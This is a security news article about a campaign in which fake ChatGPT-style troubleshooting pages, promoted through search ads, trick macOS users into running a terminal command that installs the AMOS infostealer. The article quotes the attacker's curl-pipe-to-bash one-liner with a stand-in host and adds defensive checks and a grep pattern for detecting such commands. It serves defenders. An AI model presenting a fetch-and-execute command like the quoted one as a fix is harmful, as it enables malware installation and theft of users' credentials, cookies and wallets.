A new malware campaign is exploiting users’ trust in AI support tools, using fake ChatGPT troubleshooting sessions to infect macOS devices with the AMOS InfoStealer.
Victims searching for simple fixes — such as resolving sound issues — are funneled through malicious Google ads into a convincing ChatGPT-like interface that delivers a terminal command disguised as a system repair.
Once installed, the malware "… successfully exfiltrated sensitive data from the system," according to Kroll researchers.
From Search Ad to System Compromise
Unlike traditional phishing campaigns that depend on fake installers, email attachments, or overtly suspicious downloads, this attack is engineered to feel routine and trustworthy.
Victims encounter malicious content embedded in search results or advertisements that appear to offer legitimate troubleshooting guidance.
The interaction mimics a normal support exchange: the user explains a problem, receives a clear and authoritative response, and is instructed to run a single terminal command to “fix” the issue. That moment of trust is what triggers the compromise.
The attacker-provided command follows a familiar one-liner pattern commonly used by developers and IT professionals:
curl -s https://attacker-example[.]com/installer.sh | bash
At a glance, this looks like a standard way to install open-source tools or apply quick fixes.
In reality, the pipeline immediately downloads and executes a remote shell script without giving the user a chance to inspect its contents.
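By contrast, a more cautious workflow (sketched below with a placeholder URL) separates the download from execution so the script can actually be read before anything runs:

# Download to a file instead of piping straight into bash (placeholder URL for illustration)
curl -s -o installer.sh https://example.com/installer.sh
# Review the script's contents before deciding whether to run it
less installer.sh
# Only after inspection and verification of the source: bash installer.sh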
This behavior maps directly to MITRE ATT&CK techniques such as User Execution (T1204) and Ingress Tool Transfer (T1105), where attackers rely on legitimate system utilities to bootstrap malware delivery.
Once executed, the script silently installs the AMOS infostealer, establishes persistence mechanisms to survive reboots, and begins harvesting sensitive data such as browser credentials, cookies, and cryptocurrency wallets.
Because the activity occurs within the terminal and leverages built-in macOS tools, it avoids triggering typical installer prompts, Gatekeeper warnings, or other visible security dialogs, allowing the infection to proceed largely unnoticed.
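For illustration only (these are generic macOS checks, not indicators specific to this campaign), the user-level launchd persistence locations that such scripts commonly abuse can be reviewed with built-in tools:

# List per-user and system-wide launch agents for unfamiliar entries
ls -l ~/Library/LaunchAgents /Library/LaunchAgents 2>/dev/null
# Show launchd jobs loaded for the current user, filtering out Apple's own
launchctl list | grep -v "com.apple"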
Kroll researchers note that the campaign’s effectiveness is further amplified by the infrastructure behind it.
The malicious ads and landing pages use domains and branding that closely resemble legitimate services, significantly lowering user suspicion and increasing the likelihood that targets will follow the provided instructions.
Why AI-Based Social Engineering Works
This technique is effective because it exploits a growing behavioral norm: relying on AI tools for fast, authoritative troubleshooting.
By presenting the lure through a fully interactive, ChatGPT-like interface rather than a static phishing page, the experience feels familiar and trustworthy to users.
The workflow closely mirrors legitimate support interactions — identify a problem, receive a diagnosis, and run a suggested command — lowering defenses and encouraging compliance.
Visibility is further amplified through search engine poisoning via sponsored ads, placing the malicious content where users are most likely to encounter it.
Framing the payload as a routine macOS repair command promotes quick execution, while the absence of traditional downloads, installer dialogs, or authentication prompts removes friction that might otherwise trigger suspicion.
Together, these elements provide attackers with a highly reliable entry point into both unmanaged personal systems and corporate BYOD environments.
Reducing Risk From AI-Driven Social Engineering
Terminal-based social engineering attacks are becoming increasingly effective as users grow more comfortable following AI-generated troubleshooting guidance.
Rather than exploiting software flaws, these campaigns rely on trust, routine workflows, and legitimate system tools to quietly establish compromise.
Defending against this technique requires layered controls that limit risky command execution, detect abuse early, and reduce the impact of credential theft.
- Educate employees to treat terminal-based instructions from AI chats, ads, or unfamiliar troubleshooting sites as high risk and avoid running unverified commands.
- Deploy macOS endpoint detection and response capable of monitoring and blocking suspicious shell activity, including cURL pipelines, bash execution, and persistence attempts.
- Restrict command execution by blocking or alerting on curl | bash–style patterns (a rough example heuristic appears after this list), enforcing script signing, and limiting shell use to approved users and devices.
- Implement DNS, web, and egress filtering to block newly registered or malicious domains and reduce exposure to search-engine and ad-based delivery infrastructure.
- Harden identity and credential protections by enforcing phishing-resistant MFA, limiting local admin access, and discouraging browser-based storage of corporate credentials.
- Continuously monitor for indicators of compromise (IoCs), including abnormal outbound connections, configuration changes, and credential or token access, and test detections through regular simulations.
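As a minimal illustration of the curl-pipe-to-shell pattern mentioned above (a rough heuristic for triage, not a production detection rule), local shell history can be searched for commands that pipe a download directly into an interpreter:

# Look for download-and-execute one-liners in local shell history (rough heuristic)
grep -nE 'curl[^|]*\|[[:space:]]*(ba|z)?sh' ~/.bash_history ~/.zsh_history 2>/dev/null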
Together, these measures help organizations reduce exposure to terminal-based attacks while maintaining practical and efficient workflows for end users.
Attackers Are Weaponizing AI Trust
This campaign reflects a broader shift in attacker tactics, where AI-style interfaces are replacing traditional phishing pages as the preferred delivery mechanism.
As users become more comfortable relying on chat-based tools for troubleshooting and guidance, adversaries are increasingly able to mirror those interactions with convincing accuracy.
The AMOS campaign shows how a single copy-and-paste command — executed by a user who believes they are following legitimate AI advice — can compromise a macOS system almost instantly.
As AI becomes more embedded in everyday support and productivity workflows, attackers will continue to exploit that trust, making AI-branded lures a growing and persistent risk organizations need to account for in their security models.
As AI-driven impersonation becomes more realistic, the focus of defense is moving toward detecting manipulated and synthetic content.
